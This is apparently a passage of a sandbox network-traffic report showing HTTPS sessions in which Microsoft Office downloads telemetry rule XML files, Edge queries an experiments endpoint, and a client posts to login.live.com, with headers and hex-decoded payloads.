                                                                                                                                                                                                                                                      2024-11-30 21:38:37 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      79192.168.2.104980213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:37 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:38 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 502
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                      x-ms-request-id: 592f830c-001e-005a-4566-40c3d0000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213838Z-174f7845968xlwnmhC1EWR0sv800000011r000000000hyqp
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      80192.168.2.104980113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:38 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                      x-ms-request-id: 5810e7a8-301e-0000-3f91-3feecc000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213838Z-174f7845968xr5c2hC1EWRd0hn0000000kw00000000085bh
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      81192.168.2.104980994.245.104.564432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                      Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:37 GMT
                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                      Set-Cookie: ARRAffinity=450dfd268f8a743df3163736f7e10bb0b3d546aeb5345f053777aa7edaa19a9e;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                      Set-Cookie: ARRAffinitySameSite=450dfd268f8a743df3163736f7e10bb0b3d546aeb5345f053777aa7edaa19a9e;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                      Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      82192.168.2.104981013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:38 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:39 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                      x-ms-request-id: fd79bfa2-c01e-0079-5434-41e51a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213839Z-174f7845968pght8hC1EWRyvxg000000053g00000000bvbs
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      83192.168.2.104981113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:39 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                      x-ms-request-id: fd1a7fe0-c01e-0046-7814-412db9000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213839Z-174f7845968px8v7hC1EWR08ng000000128000000000a8xm
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      84192.168.2.104981213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:39 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                      x-ms-request-id: 29844c33-001e-0034-1337-40dd04000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213839Z-174f7845968cdxdrhC1EWRg0en000000121g0000000023w5
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:39 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      85192.168.2.104981513.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:40 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                      x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213840Z-174f7845968psccphC1EWRuz9s000000129g000000005vpd
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      86192.168.2.104981613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:40 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                      x-ms-request-id: 8b39e191-d01e-0065-5191-3fb77a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213840Z-174f7845968kdththC1EWRzvxn0000000ef000000000020s
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      87192.168.2.104981420.190.147.7443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                      Content-Length: 3592
                                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                                      2024-11-30 21:38:40 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                      Expires: Sat, 30 Nov 2024 21:37:40 GMT
                                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                      x-ms-route-info: C512_BAY
                                                                                                                                                                                                                                                      x-ms-request-id: 789ce3b8-4f68-4b72-ab56-4d4313eaa4e7
                                                                                                                                                                                                                                                      PPServer: PPV: 30 H: PH1PEPF00011E44 V: 0
